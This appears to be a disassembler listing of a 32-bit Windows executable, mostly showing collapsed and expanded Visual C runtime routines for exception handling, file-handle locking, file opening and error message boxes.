; [00000014 BYTES: COLLAPSED FUNCTION __sse2_mathfcns_init. PRESS KEYPAD "+" TO EXPAND]
; [000000D1 BYTES: COLLAPSED FUNCTION __floor_default. PRESS KEYPAD "+" TO EXPAND]
; [0000022B BYTES: COLLAPSED FUNCTION strtoxl(localeinfo_struct *,char const *,char const * *,int,int). PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _strtol. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; [0000016F BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000DB BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000198 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000135 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40B042 proc near ; CODE XREF: ___tmainCRTStartup:loc_40402C�p
push esi
push edi
mov eax, offset dword_421294
mov edi, offset dword_421294
cmp eax, edi
mov esi, eax
jnb short loc_40B063
loc_40B054: ; CODE XREF: sub_40B042+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B05C
call eax
loc_40B05C: ; CODE XREF: sub_40B042+16�j
add esi, 4
cmp esi, edi
jb short loc_40B054
loc_40B063: ; CODE XREF: sub_40B042+10�j
pop edi
pop esi
retn
sub_40B042 endp
; =============== S U B R O U T I N E =======================================
; void __cdecl sub_40B066()
sub_40B066 proc near ; DATA XREF: __cinit+3F�o
push esi
push edi
mov eax, offset dword_42129C
mov edi, offset dword_42129C
cmp eax, edi
mov esi, eax
jnb short loc_40B087
loc_40B078: ; CODE XREF: sub_40B066+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B080
call eax
loc_40B080: ; CODE XREF: sub_40B066+16�j
add esi, 4
cmp esi, edi
jb short loc_40B078
loc_40B087: ; CODE XREF: sub_40B066+10�j
pop edi
pop esi
retn
sub_40B066 endp
; [00000094 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION $LN9_2. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __CxxRestoreUnhandledExceptionFilter(void). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40B1CF proc near ; DATA XREF: .rdata:004216E8�o
mov dword ptr [ecx], offset off_41DC24
jmp sub_402CCA
sub_40B1CF endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_40B1DA(void *Memory,char)
sub_40B1DA proc near ; DATA XREF: .rdata:off_41DC24�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41DC24
call sub_402CCA
test [esp+4+arg_0], 1
jz short loc_40B1F6
push esi ; Memory
call j__free
pop ecx
loc_40B1F6: ; CODE XREF: sub_40B1DA+13�j
mov eax, esi
pop esi
retn 4
sub_40B1DA endp
; [0000005C BYTES: COLLAPSED FUNCTION ___TypeMatch. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION ___FrameUnwindFilter. PRESS KEYPAD "+" TO EXPAND]
; [000000C0 BYTES: COLLAPSED FUNCTION ___FrameUnwindToState. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION $LN29. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION $LN18_4. PRESS KEYPAD "+" TO EXPAND]
; [00000045 BYTES: COLLAPSED FUNCTION ExFilterRethrow(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___DestructExceptionObject. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
$LN14_5:
xor eax, eax
cmp [ebp+0Ch], al
setnz al
$LN12_4:
retn
; ---------------------------------------------------------------------------
$LN9_3:
mov esp, [ebp-18h]
jmp ?terminate@@YAXXZ ; terminate(void)
; [00000025 BYTES: COLLAPSED FUNCTION ___AdjustPointer. PRESS KEYPAD "+" TO EXPAND]
; [00000079 BYTES: COLLAPSED FUNCTION IsInExceptionSpec(EHExceptionRecord *,_s_ESTypeList const *). PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION unknown_libname_101. PRESS KEYPAD "+" TO EXPAND]
db 83h ; ƒ
db 4Dh ; M
db 0FCh ; ü
db 0FFh
db 0E9h ; é
db 74h ; t
db 9
db 0
db 0
; [00000018 BYTES: COLLAPSED FUNCTION unknown_libname_102. PRESS KEYPAD "+" TO EXPAND]
; [0000011B BYTES: COLLAPSED FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION $LN27_2. PRESS KEYPAD "+" TO EXPAND]
; [00000076 BYTES: COLLAPSED FUNCTION $LN16_3. PRESS KEYPAD "+" TO EXPAND]
; [0000017F BYTES: COLLAPSED FUNCTION ___BuildCatchObjectHelper. PRESS KEYPAD "+" TO EXPAND]
; [00000085 BYTES: COLLAPSED FUNCTION ___BuildCatchObject. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
$LN19_5:
xor eax, eax
inc eax
$LN17_2:
retn
; ---------------------------------------------------------------------------
$LN14_6:
mov esp, [ebp-18h]
jmp ?terminate@@YAXXZ ; terminate(void)
; [0000006C BYTES: COLLAPSED FUNCTION CatchIt(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,_s_HandlerType const *,_s_CatchableType const *,_s_TryBlockMapEntry const *,int,EHRegistrationNode *,uchar). PRESS KEYPAD "+" TO EXPAND]
; [000000F2 BYTES: COLLAPSED FUNCTION FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [00000356 BYTES: COLLAPSED FUNCTION unknown_libname_104. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_108: ; Microsoft VisualC 2-8/net runtime
push esi
push dword ptr [esp+8]
mov esi, ecx
call ??0exception@std@@QAE@ABV01@@Z ; std::exception::exception(exception::exception const &)
mov dword ptr [esi], offset off_41DC24
mov eax, esi
pop esi
retn 4
; [000000E4 BYTES: COLLAPSED FUNCTION ___InternalCxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
$LN12_5:
xor eax, eax
inc eax
$LN10_3:
retn
; ---------------------------------------------------------------------------
$LN7_1:
mov esp, [ebp-18h]
; [00000012 BYTES: COLLAPSED CHUNK OF FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION unexpected(void). PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION _inconsistency(void). PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __initp_eh_hooks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION unknown_libname_109. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __freea. PRESS KEYPAD "+" TO EXPAND]
; [000003A2 BYTES: COLLAPSED FUNCTION unknown_libname_111. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001B8 BYTES: COLLAPSED FUNCTION __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int). PRESS KEYPAD "+" TO EXPAND]
; [00000040 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000190 BYTES: COLLAPSED FUNCTION __free_lc_time. PRESS KEYPAD "+" TO EXPAND]
; [00000040 BYTES: COLLAPSED FUNCTION ___free_lconv_num. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___free_lconv_mon. PRESS KEYPAD "+" TO EXPAND]
; [00000071 BYTES: COLLAPSED FUNCTION _strcat_s. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000046 BYTES: COLLAPSED FUNCTION _strcspn. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION _strncpy_s. PRESS KEYPAD "+" TO EXPAND]
; [000000BE BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000040 BYTES: COLLAPSED FUNCTION _strpbrk. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __isleadbyte_l. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION _isleadbyte. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION __isctype_l. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40CAFA proc near ; CODE XREF: __init_pointers+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_42641C, eax
retn
sub_40CAFA endp
; [00000010 BYTES: COLLAPSED FUNCTION __crtInitCritSecNoSpinCount(x,x). PRESS KEYPAD "+" TO EXPAND]
; [000000C5 BYTES: COLLAPSED FUNCTION ___crtInitCritSecAndSpinCount. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __ValidateImageBase. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION __FindPESection. PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION __IsNonwritableInCurrentImage. PRESS KEYPAD "+" TO EXPAND]
; [00000083 BYTES: COLLAPSED FUNCTION __lseeki64_nolock. PRESS KEYPAD "+" TO EXPAND]
; [0000010F BYTES: COLLAPSED FUNCTION __lseeki64. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN14_7. PRESS KEYPAD "+" TO EXPAND]
; [000005C6 BYTES: COLLAPSED FUNCTION __write_nolock. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: __flsbuf+CB�p
; __flsbuf+13A�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4217C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D44F
call ___doserrno
and dword ptr [eax], 0
call __errno
mov dword ptr [eax], 9
loc_40D447: ; CODE XREF: sub_40D420+5C�j
or eax, 0FFFFFFFFh
jmp loc_40D4EC
; ---------------------------------------------------------------------------
loc_40D44F: ; CODE XREF: sub_40D420+12�j
xor edi, edi
cmp eax, edi
jl short loc_40D45D
cmp eax, dword_433C84
jb short loc_40D47E
loc_40D45D: ; CODE XREF: sub_40D420+33�j
; sub_40D420+7C�j
call ___doserrno
mov [eax], edi
call __errno
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call __invalid_parameter
add esp, 14h
jmp short loc_40D447
; ---------------------------------------------------------------------------
loc_40D47E: ; CODE XREF: sub_40D420+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40D45D
push eax
call ___lock_fhandle
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D4C7
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call __write_nolock
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D4C7: ; CODE XREF: sub_40D420+8F�j
call __errno
mov dword ptr [eax], 9
call ___doserrno
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40D4DD: ; CODE XREF: sub_40D420+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D4F2
mov eax, [ebp+var_1C]
loc_40D4EC: ; CODE XREF: sub_40D420+2A�j
call __SEH_epilog4
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
sub_40D4F2 proc near ; CODE XREF: sub_40D420+C4�p
; DATA XREF: .rdata:004217D8�o
push dword ptr [ebp+8]
call __unlock_fhandle
pop ecx
retn
sub_40D4F2 endp
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [0000001F BYTES: COLLAPSED FUNCTION __initp_misc_cfltcvt_tab. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __get_printf_count_output. PRESS KEYPAD "+" TO EXPAND]
; [0000015F BYTES: COLLAPSED FUNCTION __wctomb_s_l. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _wctomb_s. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000095 BYTES: COLLAPSED FUNCTION __aulldvrm. PRESS KEYPAD "+" TO EXPAND]
; [00000087 BYTES: COLLAPSED FUNCTION _fastcopy_I. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION unknown_libname_114. PRESS KEYPAD "+" TO EXPAND]
; [000000F7 BYTES: COLLAPSED FUNCTION __calloc_impl. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION $LN37_0. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN24_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000019 BYTES: COLLAPSED CHUNK OF FUNCTION __calloc_impl. PRESS KEYPAD "+" TO EXPAND]
; [0000013E BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION $LN66. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN48. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [000000CE BYTES: COLLAPSED CHUNK OF FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000047 BYTES: COLLAPSED FUNCTION __recalloc. PRESS KEYPAD "+" TO EXPAND]
; [00000019 BYTES: COLLAPSED FUNCTION __initp_misc_winsig. PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION _siglookup. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40DD1C proc near ; CODE XREF: _abort:loc_4101EA�p
push dword_42642C
call __decode_pointer
pop ecx
retn
sub_40DD1C endp
; [0000016E BYTES: COLLAPSED FUNCTION unknown_libname_119. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION unknown_libname_123. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION unknown_libname_124. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION sub_40DEAC. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED CHUNK OF FUNCTION unknown_libname_119. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION unknown_libname_126. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40DEE3 proc near ; CODE XREF: __init_pointers+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_426444, eax
retn
sub_40DEE3 endp
; [00000057 BYTES: COLLAPSED FUNCTION _fastzero_I. PRESS KEYPAD "+" TO EXPAND]
; [0000008F BYTES: COLLAPSED FUNCTION unknown_libname_127. PRESS KEYPAD "+" TO EXPAND]
; [00000096 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN13_11. PRESS KEYPAD "+" TO EXPAND]
; [0000063E BYTES: COLLAPSED FUNCTION __tsopen_nolock. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6B0 proc near ; CODE XREF: sub_40E77C+14�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 14h
push offset dword_421860
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
xor eax, eax
mov edi, [ebp+arg_10]
cmp edi, esi
setnz al
cmp eax, esi
jnz short loc_40E6EA
loc_40E6CF: ; CODE XREF: sub_40E6B0+47�j
; sub_40E6B0+5B�j
call __errno
push 16h
pop edi
mov [eax], edi
push esi
push esi
push esi
push esi
push esi
call __invalid_parameter
add esp, 14h
mov eax, edi
jmp short loc_40E743
; ---------------------------------------------------------------------------
loc_40E6EA: ; CODE XREF: sub_40E6B0+1D�j
or dword ptr [edi], 0FFFFFFFFh
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jz short loc_40E6CF
cmp [ebp+arg_14], esi
jz short loc_40E70D
mov eax, [ebp+arg_C]
and eax, 0FFFFFE7Fh
neg eax
sbb eax, eax
inc eax
jz short loc_40E6CF
loc_40E70D: ; CODE XREF: sub_40E6B0+4C�j
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
mov eax, edi
call __tsopen_nolock
add esp, 14h
mov [ebp+var_20], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E74E
mov eax, [ebp+var_20]
cmp eax, esi
jz short loc_40E743
or dword ptr [edi], 0FFFFFFFFh
loc_40E743: ; CODE XREF: sub_40E6B0+38�j
; sub_40E6B0+8E�j
call __SEH_epilog4
retn
sub_40E6B0 endp
; =============== S U B R O U T I N E =======================================
sub_40E749 proc near ; DATA XREF: .rdata:00421878�o
xor esi, esi
mov edi, [ebp+18h]
sub_40E749 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E74E proc near ; CODE XREF: sub_40E6B0+84�p
cmp [ebp-1Ch], esi
jz short locret_40E77B
cmp [ebp-20h], esi
jz short loc_40E773
mov eax, [edi]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
imul eax, 28h
mov ecx, dword_433CA0[ecx*4]
lea eax, [ecx+eax+4]
and byte ptr [eax], 0FEh
loc_40E773: ; CODE XREF: sub_40E74E+8�j
push dword ptr [edi]
call __unlock_fhandle
pop ecx
locret_40E77B: ; CODE XREF: sub_40E74E+3�j
retn
sub_40E74E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E77C proc near ; CODE XREF: __openfile+26D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40E6B0
add esp, 18h
pop ebp
retn
sub_40E77C endp
; [0000021A BYTES: COLLAPSED FUNCTION __mbsicmp_l. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION __mbsicmp. PRESS KEYPAD "+" TO EXPAND]
; [00000169 BYTES: COLLAPSED FUNCTION unknown_libname_131. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40EB30(char *,char *,size_t)
sub_40EB30 proc near ; CODE XREF: __openfile+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0 ; int
push [esp+4+arg_8] ; size_t
push [esp+8+arg_4] ; char *
push [esp+0Ch+arg_0] ; char *
call unknown_libname_131 ; Microsoft VisualC 2-8/net runtime
add esp, 10h
retn
sub_40EB30 endp
; ---------------------------------------------------------------------------
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000045 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000084 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __NLG_Notify1. PRESS KEYPAD "+" TO EXPAND]
; [0000001F BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000003 BYTES: COLLAPSED FUNCTION __NLG_Call. PRESS KEYPAD "+" TO EXPAND]
; [0000007D BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000081 BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000071 BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [00000092 BYTES: COLLAPSED FUNCTION ___lock_fhandle. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION $LN14_9. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN11_4. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unlock_fhandle. PRESS KEYPAD "+" TO EXPAND]
; [000000CD BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION $LN48_0. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [000000BA BYTES: COLLAPSED CHUNK OF FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN31_0. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION __commit. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN16_4. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION __isdigit_l. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _isdigit. PRESS KEYPAD "+" TO EXPAND]
; [00000054 BYTES: COLLAPSED FUNCTION __isxdigit_l. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _isxdigit. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION __isspace_l. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
; [0000011E BYTES: COLLAPSED FUNCTION __ungetc_nolock. PRESS KEYPAD "+" TO EXPAND]
; [00000113 BYTES: COLLAPSED FUNCTION __mbtowc_l. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F524 proc near ; CODE XREF: __NMSG_WRITE+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call __encoded_null
xor ebx, ebx
cmp dword_426488, ebx
mov [ebp+var_10], eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz loc_40F5F9
push offset aUser32_dll ; "USER32.DLL"
call ds:dword_41D0E8 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jnz short loc_40F564
loc_40F55D: ; CODE XREF: sub_40F524+50�j
xor eax, eax
jmp loc_40F6BD
; ---------------------------------------------------------------------------
loc_40F564: ; CODE XREF: sub_40F524+37�j
mov esi, ds:dword_41D0EC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
jz short loc_40F55D
push eax
call __encode_pointer
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov dword_426488, eax
call esi ; GetProcAddress
push eax
call __encode_pointer
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_42648C, eax
call esi ; GetProcAddress
push eax
call __encode_pointer
mov dword_426490, eax
lea eax, [ebp+var_8]
push eax
call sub_407906
test eax, eax
pop ecx
pop ecx
jz short loc_40F5C7
push ebx
push ebx
push ebx
push ebx
push ebx
call __invoke_watson
add esp, 14h
loc_40F5C7: ; CODE XREF: sub_40F524+94�j
cmp [ebp+var_8], 2
jnz short loc_40F5F9
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
push eax
call __encode_pointer
cmp eax, ebx
pop ecx
mov dword_426498, eax
jz short loc_40F5F9
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
push eax
call __encode_pointer
pop ecx
mov dword_426494, eax
loc_40F5F9: ; CODE XREF: sub_40F524+22�j
; sub_40F524+A7�j ...
mov eax, dword_426494
mov esi, [ebp+var_10]
cmp eax, esi
jz short loc_40F672
cmp dword_426498, esi
jz short loc_40F672
push eax
call __decode_pointer
pop ecx
call eax
cmp eax, ebx
jz short loc_40F63F
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
push dword_426498
call __decode_pointer
pop ecx
call eax
test eax, eax
jz short loc_40F63F
test [ebp+var_18], 1
jnz short loc_40F672
loc_40F63F: ; CODE XREF: sub_40F524+F4�j
; sub_40F524+113�j
lea eax, [ebp+var_C]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_40F65A
push ebx
push ebx
push ebx
push ebx
push ebx
call __invoke_watson
add esp, 14h
loc_40F65A: ; CODE XREF: sub_40F524+127�j
cmp [ebp+var_C], 4
jb short loc_40F669
or [ebp+arg_8], 200000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F669: ; CODE XREF: sub_40F524+13A�j
or [ebp+arg_8], 40000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F672: ; CODE XREF: sub_40F524+DF�j
; sub_40F524+E7�j ...
mov eax, dword_42648C
cmp eax, esi
jz short loc_40F6A3
push eax
call __decode_pointer
pop ecx
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40F6A3
mov eax, dword_426490
cmp eax, esi
jz short loc_40F6A3
push [ebp+var_4]
push eax
call __decode_pointer
pop ecx
call eax
mov [ebp+var_4], eax
loc_40F6A3: ; CODE XREF: sub_40F524+143�j
; sub_40F524+14C�j ...
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push dword_426488
call __decode_pointer
pop ecx
call eax
loc_40F6BD: ; CODE XREF: sub_40F524+3B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F524 endp
; [00000046 BYTES: COLLAPSED FUNCTION __set_error_mode. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40F708 proc near ; CODE XREF: __umatherr+5F�p
; DATA XREF: ___libm_error_support:loc_40A46D�o
xor eax, eax
retn
sub_40F708 endp
; [00000060 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
